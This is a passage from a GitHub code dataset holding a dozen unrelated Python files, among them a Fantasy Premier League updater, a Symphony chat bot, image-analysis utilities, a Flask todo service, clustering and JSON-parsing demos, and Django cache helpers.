fixtures_df['team_h'].map(teams)\n\n home_strength=dict(zip(teams_df.id, teams_df.strength_overall_home))\n away_strength=dict(zip(teams_df.id, teams_df.strength_overall_home))\n\n fixtures_df['team_a_strength'] = fixtures_df['team_a'].map(away_strength)\n fixtures_df['team_h_strength'] = fixtures_df['team_h'].map(home_strength)\n\n a_players = pd.merge(players_df, fixtures_df, how=\"inner\", left_on=[\"team\"], right_on=[\"team_a\"])\n h_players = pd.merge(players_df, fixtures_df, how=\"inner\", left_on=[\"team\"], right_on=[\"team_h\"])\n\n a_players['diff'] = a_players['team_a_strength'] - a_players['team_h_strength']\n h_players['diff'] = h_players['team_h_strength'] - h_players['team_a_strength']\n\n players_df = a_players.append(h_players)\n return players_df, fixtures_df, gameweek\ndef get(url):\n response = requests.get(url)\n return json.loads(response.content)\n\ndef check_update(df):\n \n today = datetime.now()\n tomorrow=(today + timedelta(days=1)).timestamp()\n today = datetime.now().timestamp()\n df = df.loc[df.deadline_time_epoch>today]\n \n deadline = df.iloc[0].deadline_time_epoch\n if deadline1]\n ps_not_playing = df.loc[~df.team.isin(teams_playing)]\n ps_playing_twice=df.loc[df.team.isin(teams_playing_twice)]\n for x in df.iterrows():\n \n weight = 0.1\n weight+= x[1]['diff']/5\n if mode == 'b':\n weight+= float(x[1]['points_per_game'])*4\n else:\n weight+= float(x[1]['form'])*4\n weight -= (100-float(x[1]['chance_of_playing_this_round'])) * 0.2\n weight -= (100-float(x[1]['chance_of_playing_next_round'])) * 0.2\n if weight < 0:\n weight = 0\n if x[1]['id'] in ps_not_playing['id']:\n weight+=5\n if x[1]['id'] in ps_playing_twice['id']:\n weight -=5\n \n if weight < 3:\n weight = 0\n x[1]['weight'] = weight\n df1 = df1.append(x[1])\n df1=df1.sort_values('weight', ascending=False).iloc[0:200]\n return df1.sample(1, weights=df1.weight)\n\ndef calc_out_weight(players):\n\n df1 = pd.DataFrame(columns=players.columns.tolist())\n\n for x in players.iterrows():\n weight = 20\n weight-= x[1]['diff']/5\n weight -= float(x[1]['form'])*5\n weight += (100-float(x[1]['chance_of_playing_this_round'])) * 0.2\n\n if weight < 0:\n weight = 0\n if x[1]['element_type'] == 1:\n weight == 0\n if weight < 0:\n weight = 0\n x[1]['weight'] = weight\n df1 = df1.append(x[1])\n return df1.sample(1, weights=df1.weight)\n\ndef calc_starting_weight(players):\n df1 = pd.DataFrame(columns=players.columns.tolist())\n\n for x in players.iterrows():\n weight = 0\n weight+= x[1]['diff']/5\n weight += float(x[1]['form'])*5\n weight -= (100-float(x[1]['chance_of_playing_this_round'])) * 0.2\n\n if weight < 0:\n weight = 0\n x[1]['weight'] = weight\n df1 = df1.append(x[1])\n return df1\n\ndef lambda_handler(event, context):\n email = \"fwexnbhqowxfcdejdv@rffff.net\"\n password = \"password123\"\n user_id = \"6993864\"\n update_team(email, password,user_id)\n","repo_name":"ConorAspell/fpl_youtube_part_1","sub_path":"updates.py","file_name":"updates.py","file_ext":"py","file_size_in_byte":9185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4564264849","text":"#!/usr/bin/env python3\nimport asyncio\nimport logging.config\nfrom pathlib import Path\n\nfrom symphony.bdk.core.activity.command import CommandContext\nfrom symphony.bdk.core.config.loader import BdkConfigLoader\nfrom symphony.bdk.core.service.datafeed.real_time_event_listener import RealTimeEventListener\nfrom symphony.bdk.core.symphony_bdk import SymphonyBdk\nfrom symphony.bdk.gen.agent_model.v4_initiator import V4Initiator\nfrom symphony.bdk.gen.agent_model.v4_message_sent import V4MessageSent\n\nfrom .activities import EchoCommandActivity, GreetUserJoinedActivity\nfrom .gif_activities import GifSlashCommand, GifFormReplyActivity\n\n# Configure logging\ncurrent_dir = Path(__file__).parent.parent\nlogging_conf = Path.joinpath(current_dir, 'resources', 'logging.conf')\nlogging.config.fileConfig(logging_conf, disable_existing_loggers=False)\n\n\nasync def run():\n config = BdkConfigLoader.load_from_file(Path.joinpath(current_dir, 'resources', 'config.yaml'))\n\n async with SymphonyBdk(config) as bdk:\n datafeed_loop = bdk.datafeed()\n datafeed_loop.subscribe(MessageListener())\n\n activities = bdk.activities()\n activities.register(EchoCommandActivity(bdk.messages()))\n activities.register(GreetUserJoinedActivity(bdk.messages(), bdk.users()))\n activities.register(GifSlashCommand(bdk.messages()))\n activities.register(GifFormReplyActivity(bdk.messages()))\n\n @activities.slash(\"/hello\")\n async def hello(context: CommandContext):\n name = context.initiator.user.display_name\n response = f\"Hello {name}, hope you are doing well!\"\n await bdk.messages().send_message(context.stream_id, response)\n\n # Start the datafeed read loop\n await datafeed_loop.start()\n\n\nclass MessageListener(RealTimeEventListener):\n async def on_message_sent(self, initiator: V4Initiator, event: V4MessageSent):\n logging.debug(\"Message received from %s: %s\",\n initiator.user.display_name, event.message.message)\n\n\n# Start the main asyncio run\ntry:\n logging.info(\"Running bot application...\")\n asyncio.run(run())\nexcept KeyboardInterrupt:\n logging.info(\"Ending bot application\")\n","repo_name":"finos/generator-symphony","sub_path":"generators/python/templates/bot-app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"14353567595","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 21 16:28:18 2020\r\n@author: Michael\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.ndimage\r\nimport scipy.optimize\r\nimport scipy.special as scs\r\nimport matplotlib.pyplot as plt\r\nimport tkinter as tk\r\nfrom labclerk import filedlg\r\nimport orchard as orc\r\nimport opfunclib as ofl\r\nimport scipy.interpolate as spi\r\nimport re\r\n\r\n\r\ndef getval (data,position):\r\n search= [1 if i >=position else 0 for i in data[0,:]]\r\n upperbound=search.index(1)\r\n value=(data[1,upperbound]+data[1,upperbound-1])/2\r\n return value\r\n\r\ndef read_pgm(filename, byteorder='>'):\r\n \"\"\"Return image data from a raw PGM file as numpy array.\r\n Format specification: http://netpbm.sourceforge.net/doc/pgm.html\r\n \"\"\"\r\n with open(filename, 'rb') as f:\r\n buffer = f.read()\r\n try:\r\n header, width, height, maxval = re.search(\r\n b\"(^P5\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n]\\s)*)\", buffer).groups()\r\n except AttributeError:\r\n raise ValueError(\"Not a raw PGM file: '%s'\" % filename)\r\n return np.frombuffer(buffer,\r\n dtype='u1' if int(maxval) < 256 else byteorder+'u2',\r\n count=int(width)*int(height),\r\n offset=len(header)\r\n ).reshape((int(height), int(width)))\r\n\r\n\r\n\r\ndef diodetrace(position,intensity):\r\n modpos=position-np.mean(position)\r\n def trace(x,A,FWHM):\r\n y=(1/(2*np.sqrt(1/FWHM**2)*np.sqrt(np.log(2))))*A*(0.8862269254527579*scs.erf(2*np.sqrt(1/FWHM**2)*(0.4999999995 - x)*np.sqrt(np.log(2))) + 0.8862269254527579* scs.erf(2*np.sqrt(1/FWHM**2)*(0.5000000005 + x)*np.sqrt(np.log(2))))\r\n return y\r\n imax=np.amax(intensity)\r\n fit,covar=scipy.optimize.curve_fit(trace,modpos,intensity,p0=[imax,1])\r\n return fit\r\ndef uline(image):\r\n \"\"\"\r\n Brings up image and user selects two points to define a line across. Returns coordinates of two points.\r\n \"\"\"\r\n orc.imshow(image)\r\n pts=np.intc(plt.ginput(2,timeout=-1))\r\n plt.close()\r\n return pts\r\n \r\ndef extractlineout(image,x0,x1,y0,y1,num,width): # provides lineout of image with averaging over specified width\r\n if x1==x0:\r\n dx=width/2\r\n dy=0\r\n elif y1==y0:\r\n dx=0\r\n dy=width/2\r\n else:\r\n angle=np.arctan((y1-y0)/(x1-x0))\r\n dx=width/2*np.sin(angle)\r\n dy=width/2*np.cos(angle)\r\n x0s=np.linspace(x0-dx,x0+dx,width)\r\n x1s=np.linspace(x1-dx,x1+dx,width)\r\n y0s=np.linspace(y0-dy,y0+dy,width)\r\n y1s=np.linspace(y1-dy,y1+dy,width)\r\n length=np.sqrt((x1-x0)**2+(y1-y0)**2)\r\n dist=np.linspace(0,length,num)\r\n line=np.zeros(num)\r\n for i in range(width):\r\n x, y = np.linspace(x0s[i], x1s[i], num), np.linspace(y0s[i], y1s[i], num) \r\n line = line+scipy.ndimage.map_coordinates(image, np.vstack((y,x)))/width # Extract the values along the line, using cubic interpolation. x & y flipped becuase of image format\r\n #data=np.vstack((dist,line))\r\n plt.close()\r\n return line,dist\r\n\r\ndef lineout(image,num,width):\r\n pt0,pt1=uline(image)\r\n x0,y0=pt0\r\n x1,y1=pt1\r\n line,dist=extractlineout(image,x0,x1,y0,y1,num,width)\r\n return line,dist,pt0,pt1\r\n \r\ndef integim(image):\r\n maxind=np.argmax(image[1:,1:]) # gives the flattened index of maximum ignoring the first row and column due to camera aberrations\r\n cols=np.size(image,axis=1) # find number of columns\r\n rows=np.size(image,axis=0)\r\n maxrow=maxind//(cols-1)+1\r\n maxcol=maxind%(cols-1)+1\r\n maxind=(maxrow,maxcol)\r\n \r\n rmax=np.min([maxrow,maxcol,rows-maxrow,cols-maxcol])\r\n radii=range(rmax)\r\n sums=[]\r\n modderiv=[]\r\n for r in radii:\r\n newsum=np.sum(image[maxrow-r:maxrow+r+1,maxcol-r:maxcol+r+1])\r\n sums.append(newsum)\r\n \r\n if r==0:\r\n modderiv.append(newsum)\r\n else:\r\n modderiv.append((sums[r]-sums[r-1])/(4*r))\r\n \r\n return maxind,np.array(sums),np.array(modderiv) \r\n\r\ndef fluencefactor(image,threshold=5):\r\n \"\"\"\r\n Calculates the fluence factor for focal spot images.\r\n \"\"\"\r\n maxind,sums,deriv=integim(image)\r\n crop_radius=np.min(np.where(deriv<0.1))\r\n crop=image.copy()[maxind[0]-crop_radius:maxind[0]+crop_radius,maxind[1]-crop_radius:maxind[1]+crop_radius]\r\n \r\n orc.graph()\r\n plt.imshow(crop)\r\n \r\n crop[crop\nimport os, sys\nimport argparse\n\n##__________________________________________________________________||\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input-files\", default = [ ], nargs = '*', help = \"list of input files\")\nparser.add_argument(\"--dataset-names\", default = [ ], nargs = '*', help = \"list of data set names\")\nparser.add_argument(\"-p\", \"--process\", default = 1, type = int, help = \"number of processes to run in parallel\")\nparser.add_argument('-o', '--outdir', default = os.path.join('tbl', 'out'))\nparser.add_argument('-q', '--quiet', action = 'store_true', default = False, help = 'quiet mode')\nparser.add_argument('-n', '--nevents', default = -1, type = int, help = 'maximum number of events to process for each component')\nparser.add_argument('--max-events-per-process', default = -1, type = int, help = 'maximum number of events per process')\nparser.add_argument('--force', action = 'store_true', default = False, help = 'recreate all output files')\nargs = parser.parse_args()\n\n##__________________________________________________________________||\nimport AlphaTwirl\nimport Framework\nimport Scribbler\n\n##__________________________________________________________________||\ndef main():\n\n reader_collector_pairs = [ ]\n\n #\n # configure scribblers\n #\n NullCollector = AlphaTwirl.Loop.NullCollector\n reader_collector_pairs.extend([\n ])\n\n #\n # configure tables\n #\n Binning = AlphaTwirl.Binning.Binning\n Round = AlphaTwirl.Binning.Round\n RoundLog = AlphaTwirl.Binning.RoundLog\n htbin = Binning(boundaries = (0, 200, 400, 800))\n njetbin = Binning(boundaries = (1, 2, 3, 4, 5))\n tblcfg = [\n dict(keyAttrNames = ('mht40_pt', ), binnings = (Round(10, 0), ), keyOutColumnNames = ('mht', )),\n dict(keyAttrNames = ('ht40', 'mht40_pt'), binnings = (htbin, Round(10, 0)), keyOutColumnNames = ('ht', 'mht')),\n dict(keyAttrNames = ('ht40', 'nJet40', 'mht40_pt'), binnings = (htbin, njetbin, Round(10, 0)), keyOutColumnNames = ('ht', 'njet', 'mht')),\n dict(keyAttrNames = ('ht40', 'jet_pt'), binnings = (htbin, RoundLog(0.1, 100)), keyIndices = (None, 0), keyOutColumnNames = ('ht', 'jet_pt')),\n dict(keyAttrNames = ('ht40', 'jet_pt'), binnings = (htbin, RoundLog(0.1, 100)), keyIndices = (None, '*'), keyOutColumnNames = ('ht', 'jet_pt')),\n ]\n\n # complete table configs\n tableConfigCompleter = AlphaTwirl.Configure.TableConfigCompleter(\n defaultSummaryClass = AlphaTwirl.Summary.Count,\n defaultOutDir = args.outdir,\n createOutFileName = AlphaTwirl.Configure.TableFileNameComposer2()\n )\n tblcfg = [tableConfigCompleter.complete(c) for c in tblcfg]\n\n # do not recreate tables that already exist unless the force option is used\n if not args.force:\n tblcfg = [c for c in tblcfg if c['outFile'] and not os.path.exists(c['outFilePath'])]\n\n reader_collector_pairs.extend(\n [AlphaTwirl.Configure.build_counter_collector_pair(c) for c in tblcfg]\n )\n\n #\n # configure data sets\n #\n dataset_names = args.dataset_names if args.dataset_names else args.input_files\n datasets = [Framework.Dataset(n, f) for n, f in zip(dataset_names, args.input_files)]\n\n #\n # run\n #\n fw = Framework.Framework(\n quiet = args.quiet,\n process = args.process,\n max_events_per_dataset = args.nevents,\n max_events_per_process = args.max_events_per_process\n )\n fw.run(\n datasets = datasets,\n reader_collector_pairs = reader_collector_pairs\n )\n\n##__________________________________________________________________||\nif __name__ == '__main__':\n main()\n","repo_name":"TaiSakuma/twirl-example","sub_path":"twirl.py","file_name":"twirl.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38349190843","text":"from flask import request\nimport json\nfrom config import mongo_client\nfrom bson.objectid import ObjectId\nfrom bson.json_util import dumps\n\nclass Todo:\n coll_name = 'todo'\n\n def __init__(self):\n pass\n\n def get(self):\n user_id = request.headers.get('userid')\n response = []\n for data in mongo_client[self.coll_name].find({'user_id': user_id}):\n data['_id'] = str(data['_id'])\n response.append(data)\n return response\n\n def create(self):\n user_id = request.headers.get('userid')\n data = request.get_json(force=True)\n data['user_id'] = user_id\n data['_id'] = str(mongo_client[self.coll_name].insert(data))\n return data\n \n def update(self, todo_id):\n user_id = request.headers.get('userid')\n data = request.get_json(force=True)\n data['user_id'] = user_id\n mongo_client[self.coll_name].update_one({'_id': ObjectId(todo_id), 'user_id': user_id}, {'$set': data})\n return data\n \n def delete(self, todo_id):\n user_id = request.headers.get('userid')\n mongo_client[self.coll_name].delete_one({'user_id': user_id, '_id': ObjectId(todo_id)})\n return True","repo_name":"Mohammed-Aadil/bits-todo","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21700783532","text":"\n\nimport numpy as np\nfrom sklearn import mixture\n# %matplotlib inline\nimport matplotlib.pyplot as plt\n\nwith open(\"clusters.txt\") as f:\n d = f.readlines()\nn = len(d) # num of total data\ndim = 2 # dimension of data\ndata = np.zeros((n,dim), dtype='float64') # data\nfor i in range(n):\n data_ = d[i].split(',')\n data[i][0] = float(data_[0])\n data[i][1] = float(data_[1])\n# print(data)\nm=mixture.GaussianMixture(n_components=3)\nm.fit(data)\nlabels = m.predict(data)\nplt.scatter(data[:, 0], data[:, 1], c=labels, s=40, cmap='viridis')\nplt.show()\ncovariances = m.covariances_\nmeans=m.means_\nprint(\"Means:\\n\",means)\nprint(\"Covariances:\\n\",covariances)\nprint(\"Amplitude:\")\nfor i in covariances:\n print(1.0 / np.linalg.det(i))\n","repo_name":"YOYOXUE/MachineLearningINF","sub_path":"GMM/GMM_lib.py","file_name":"GMM_lib.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27102663878","text":"import random\nimport numpy as np\n\n\ndef slotGenarator(num):\n whe = random.randint(3, 5)\n print(whe)\n lst = []\n for a in range(num):\n spin = \"\"\n for b in range(whe):\n num = random.randint(1, 9)\n spin += str(num) + \" \"\n print(spin)\n lst.append(spin.strip())\n findSlotNumber(lst)\n\n\ndef findSlotNumber(ary):\n lst = []\n agn = []\n for a in ary:\n tlt = a.split(\" \")\n ntl = []\n for b in tlt:\n ntl.append(int(b))\n ntl = sorted(ntl)\n lst.append(ntl)\n agn = np.array(lst).T.tolist()\n ttl = 0\n for b in agn:\n \tttl += max(b)\n # print(lst)\n print(ttl)\n\n\nslotGenarator(50)\n","repo_name":"bipulcn/python_problem","sub_path":"quiz_12_slot.py","file_name":"quiz_12_slot.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73558265530","text":"import cv2\nimport numpy as np\n\n# Load the image\nimage = cv2.imread(\"/Users/magnusgogstad/Desktop/ImageCroppingInputs/image.jpg\")\n\n# Convert the image to grayscale\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Apply thresholding to create a binary image\n_, thresh = cv2.threshold(gray, 200, 255, cv2.THRESH_BINARY)\n\n# Find contours in the binary image\ncontours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n# Initialize variables to track the largest white rectangle\nlargest_area = 0\nlargest_contour = None\n\n# Process each contour\nfor contour in contours:\n # Calculate the area of the contour\n area = cv2.contourArea(contour)\n\n # Check if the area is larger than the current largest\n if area > largest_area:\n largest_area = area\n largest_contour = contour\n\n# Get the coordinates of the bounding box around the largest white contour\nx, y, w, h = cv2.boundingRect(largest_contour)\n\n# Crop the region containing the largest white contour\nlargest_white_contour = image[y:y+h, x:x+w]\n\n# Save the resized image as a single image\ncv2.imwrite(\"/Users/magnusgogstad/Desktop/ImageCroppingOutputs/image_new.jpg\", largest_white_contour)\n\nkernel = np.array([[0, -1, 0],\n [-1, 5,-1],\n [0, -1, 0]])\nimage_sharp = cv2.filter2D(src=image, ddepth=-1, kernel=kernel)\n\nimg = cv2.imread('/Users/magnusgogstad/Desktop/ImageCroppingOutputs/image_new.jpg', 1)\n# converting to LAB color space\nlab= cv2.cvtColor(img, cv2.COLOR_BGR2LAB)\nl_channel, a, b = cv2.split(lab)\n\n# Applying CLAHE to L-channel\n# feel free to try different values for the limit and grid size:\nclahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(12,12))\ncl = clahe.apply(l_channel)\n\n# merge the CLAHE enhanced L-channel with the a and b channel\nlimg = cv2.merge((cl,a,b))\n\n# Converting image from LAB Color model to BGR color spcae\nenhanced_img = cv2.cvtColor(limg, cv2.COLOR_LAB2BGR)\n\n# Stacking the original image with the enhanced image\nresult = np.hstack((img, enhanced_img))\ncv2.imwrite('/Users/magnusgogstad/Desktop/ImageCroppingOutputs/output_Image1.jpg',result)\ncv2.imshow('Result', result)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n\n#cv2.imshow('/Users/magnusgogstad/Desktop/outpiin.jpg', image_sharp)\n#cv2.waitKey()\n#cv2.destroyAllWindows()\n","repo_name":"jadamixd/CodeNTNU-Hackathon","sub_path":"camera/Kontrast_Sharpen.py","file_name":"Kontrast_Sharpen.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31289404208","text":"import unittest\nfrom main import part_1, part_2\n\n\nclass MainTest(unittest.TestCase):\n def test_solution_part_1(self):\n with open('./input', 'r') as data:\n r = part_1(data)\n self.assertEqual(r, 2662308295)\n\n def test_solution_part_2(self):\n with open('./input', 'r') as data:\n r = part_2(data)\n self.assertEqual(r, 63441)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Thewessen/hello-world","sub_path":"Adventofcode/2019/day09/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31006139089","text":"import os\nimport glob\nimport cv2\nfrom collections import Counter\nfrom sklearn.datasets import make_classification\nfrom imblearn.over_sampling import ADASYN\n\ndef read_data(datapath):\n datadict, labldict = {}, {}\n domnlist = [x for x in os.listdir(datapath)\n if os.path.isdir(os.path.join(datapath, x))]\n for domnitem in domnlist:\n labldict[domnitem] = {}\n datadict[domnitem] = {'X': [], 'Y': []}\n labllist = [x for x in os.listdir(os.path.join(datapath, domnitem))\n if os.path.isdir(os.path.join(datapath, domnitem, x))]\n for lablcode, lablitem in enumerate(labllist):\n labldict[domnitem][lablcode] = lablitem\n lablpath = os.path.join(datapath, domnitem, lablitem)\n filelist = glob.iglob(os.path.join(lablpath, '*.jpg'))\n print('Loading data with label {} in domain {}'.format(lablitem, domnitem))\n for fileitem in filelist:\n imagdata = cv2.imread(fileitem)\n imagdata = cv2.resize(imagdata, (256, 256))\n imagdata = imagdata.reshape(256 * 256 * 3)\n #imagdata = imagdata.transpose((2, 0, 1))\n datadict[domnitem]['X'].append(imagdata)\n datadict[domnitem]['Y'].append(lablcode)\n return datadict, labldict\n\ndef resampling(datadict, labldict, savepath):\n ratiodic = {}\n for domnitem in datadict:\n ratiodic[domnitem] = {}\n for lablcode in range(0, 31):\n ratiodic['amazon'][lablcode] = 145\n ratiodic['dslr'][lablcode] = 100\n ratiodic['webcam'][lablcode] = 100\n \n for domnitem in datadict:\n lablcout, lablnumb = {}, {}\n sorcdata = datadict[domnitem]['X']\n sorclabl = datadict[domnitem]['Y']\n print('Resampling data in domain {}'.format(domnitem))\n adasyn = ADASYN(ratio = ratiodic[domnitem], random_state = 42)\n targdata, targlabl = adasyn.fit_sample(sorcdata, sorclabl)\n print('Saving data in domain {}'.format(domnitem))\n for imagcode, targimag in enumerate(targdata):\n lablcode = targlabl[imagcode]\n if lablcode not in lablcout:\n lablcout[lablcode] = 0\n lablnumb[lablcode] = 0\n else:\n lablcout[lablcode] += 1\n for imagcode, targimag in enumerate(targdata):\n lablcode = targlabl[imagcode]\n lablname = labldict[domnitem][lablcode]\n lablnumb[lablcode] += 1\n strsleng = len(str(lablcout[lablcode]))\n numbstrs = str(lablnumb[lablcode]).zfill(strsleng)\n targpath = os.path.join(savepath, domnitem, lablname)\n if not os.path.exists(targpath): os.makedirs(targpath)\n imagpath = os.path.join(targpath, 'img_' + numbstrs)\n targimag = targimag.reshape(256, 256, 3)\n cv2.imwrite(imagpath + '.jpg', targimag)\n\nif __name__=='__main__':\n datapath = './domain_adaptation_images'\n savepath = './domain_adaptation_images_resampled'\n datadict, labldict = read_data(datapath)\n resampling(datadict, labldict, savepath)","repo_name":"JiahaoLi-gdut/CAFFE-DACH","sub_path":"examples/_imag_homo/_datasets/adasyn_over_sampling.py","file_name":"adasyn_over_sampling.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20489551855","text":"from signbank.dictionary.models import GlossFrequency\nfrom json import dumps\n\ndef regionality_score(percentages, skip_zeroes = True):\n\n if skip_zeroes:\n percentages = list(filter(lambda a: a != 0, percentages)) \n\n expected_score = 1/len(percentages)\n maximum_total_deviation = (len(percentages)-1) * expected_score + abs(1 - expected_score)\n total_deviation_from_expected = sum([abs(perc-expected_score) for perc in percentages])\n\n try:\n return total_deviation_from_expected/maximum_total_deviation\n except ZeroDivisionError:\n \treturn 0\n\nINTERESTING_GLOSSES = [(57,58),(146,459),(247,712),(344,611),(460,488),(494,495),(639,640),(649,650,651),(657,662)]\nPLACE_NORMALIZERS = {'Groningen': 23,'Amsterdam': 9,'St. Michielsgestel': 1,'Voorburg': 2.5}\ntotal_result = []\n\nfor variants in INTERESTING_GLOSSES:\n\n print('--')\n result = {place: {} for place in PLACE_NORMALIZERS.keys()}\n result_swapped = {}\n\n #Find regionals numbers\n for variant in variants:\n\n result_swapped[variant] = {place: 0 for place in PLACE_NORMALIZERS.keys()}\n\n for place in PLACE_NORMALIZERS.keys():\n result[place][variant] = 0\n\n for freq in GlossFrequency.objects.filter(gloss__pk=variant):\n\n location = freq.speaker.location\n\n if location in PLACE_NORMALIZERS.keys():\n result[location][variant] += 1 # / PLACE_NORMALIZERS[location]\n result_swapped[variant][location] += 1 / PLACE_NORMALIZERS[location]\n\n #Translate to percentages\n perc_result = {}\n for place, freq_per_variant in result.items():\n\n nr_of_occurrences = sum(freq_per_variant.values())\n if nr_of_occurrences == 0:\n continue\n\n perc_result[place] = {}\n\n for variant, freq in freq_per_variant.items():\n perc_result[place][variant] = freq/nr_of_occurrences\n\n perc_result_swapped = {}\n regionality_scores = {}\n for variant, freq_per_place in result_swapped.items():\n\n nr_of_occurrences = sum(freq_per_place.values())\n if nr_of_occurrences == 0:\n continue\n\n perc_result_swapped[variant] = {}\n\n for place, freq in freq_per_place.items():\n perc_result_swapped[variant][place] = freq/nr_of_occurrences\n\n regionality_scores[variant] = regionality_score(perc_result_swapped[variant].values())\n\n print(perc_result)\n print(perc_result_swapped)\n print(regionality_scores)\n\n total_result.append(regionality_scores)\n\nprint(dumps(total_result))","repo_name":"Signbank/Global-signbank","sub_path":"signbank/interactive-article/region_distr.py","file_name":"region_distr.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"8061681870","text":"# –*–coding:utf-8 –*–\n# 2021-03-29 11:50\nimport json\n\nfilename = 'result.json'\n\n\ndef input_json_data_from_file( path ) :\n\t\"\"\"\n\t从文件中获取json数据\n\t:param path: 文件路径\n\t:return json_data: 返回转换为json格式后的json数据\n\t\"\"\"\n\ttry :\n\t\twith open( path , 'rb+' ) as f :\n\t\t\ttry :\n\t\t\t\tjson_data = json.load( f )\n\t\t\texcept Exception as e :\n\t\t\t\tprint( 'json数据格式不正确:' + str( e ) )\n\t\treturn json_data\n\texcept Exception as e :\n\t\tprint( '文件不存在:' + str( e ) )\n\n\ndef analyze_json( jsons ) :\n\t\"\"\"\n\t解析传进来的jsons,将jsons解析成key-value并输出\n\t:param jsons: 需要解析的json字符串\n\t:return:\n\t\"\"\"\n\t# json_data = json.loads(jsons)\n\t# if isinstance(json_data, dict):\n\t# isinstance函数是Python的内部函数,他的作用是判断jsons这个参数是否为dict类型\n\t# 如果是的话返回True,否则返回False\n\tif isinstance( jsons , dict ) :\n\t\tfor key in jsons.keys() :\n\t\t\tkey_value = jsons.get( key )\n\t\t\tif isinstance( key_value , dict ) :\n\t\t\t\tanalyze_json( key_value )\n\t\t\telif isinstance( key_value , list ) :\n\t\t\t\tfor json_array in key_value :\n\t\t\t\t\tanalyze_json( json_array )\n\t\t\telse :\n\t\t\t\tprint( str( key ) + \" = \" + str( key_value ) )\n\telif isinstance( jsons , list ) :\n\t\tfor json_array in jsons :\n\t\t\tanalyze_json( json_array )\n\telse :\n\t\tprint( '请输入正确的json数据' )\n\n\ndef output_value( jsons , key ) :\n\t\"\"\"\n\t通过参数key,在jsons中进行匹配并输出该key对应的value\n\t:param jsons: 需要解析的json串\n\t:param key: 需要查找的key\n\t:return:\n\t\"\"\"\n\tkey_value = ''\n\tif isinstance( jsons , dict ) :\n\t\tfor json_result in jsons.values() :\n\t\t\tif key in jsons.keys() :\n\t\t\t\tkey_value = jsons.get( key )\n\t\t\telse :\n\t\t\t\toutput_value( json_result , key )\n\telif isinstance( jsons , list ) :\n\t\tfor json_array in jsons :\n\t\t\toutput_value( json_array , key )\n\tif key_value != '' :\n\t\tprint( str( key ) + \" = \" + str( key_value ) )\n\n\ndef main( path ) :\n\tjson_data = input_json_data_from_file( path )\n\tprint( '原始数据:' + str( json_data ) )\n\t\n\tprint( '……………………………………调用解析……………………………………' )\n\t# 调用解析\n\tprint( '将jsons1解析后的结果如下:' )\n\tanalyze_json( json_data )\n\t\n\tprint( '……………………………………调用查找……………………………………' )\n\t# 调用查找\n\tprint( '查找jsons1中t2key的value值如下:' )\n\toutput_value( json_data , \"orderId\" )\n\tprint( '……………………………………运行结束……………………………………' )\n\n\nif __name__ == '__main__' :\n\tmain( rb\"result.json\" )","repo_name":"BecauseSummer/Python","sub_path":"Demo/demo10.py","file_name":"demo10.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9254134705","text":"import logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef download_chunked(*, filefield, output_file):\n for data in filefield.storage.open(filefield.name).chunks(104857600):\n logger.info('Downloaded chunk of %s', filefield.name)\n output_file.write(data)\n logger.info('Done downloading chunked')\n","repo_name":"VeemsHQ/veems","sub_path":"veems/media/downloading.py","file_name":"downloading.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"77"} +{"seq_id":"28041186048","text":"import redis\nfrom django.core.cache import cache\nfrom django.shortcuts import get_object_or_404\nfrom django.http import Http404\nfrom django.shortcuts import reverse\n\ncache_time = 1\n\n\n\n\ndef cache_get_model_all(model):\n \"\"\"\n Get model all\n get_or_set cache\n\n \"\"\"\n\n return cache.get_or_set(\n f'{model._meta.model_name}_all',\n model.objects.all().order_by('site_name'),\n cache_time\n )\n\n\ndef cache_get_object_or_404(model, kwargs):\n \"\"\"\n Get object or 404\n get_or_set cache\n\n \"\"\"\n\n name = ','.join([f\"{key}={value}\" for key, value in kwargs.items()])\n return cache.get_or_set(\n f'{model._meta.model_name}_get_{name}',\n lambda: get_object_or_404(model, **kwargs),\n cache_time\n )\n\n\ndef cache_filter_model(model, kwargs):\n \"\"\"\n Model filter and sorted\n get_or_set cache\n \"\"\"\n\n name = ','.join([f\"{key}={value}\" for key, value in kwargs.items()])\n order_by_field = 'site_name' if 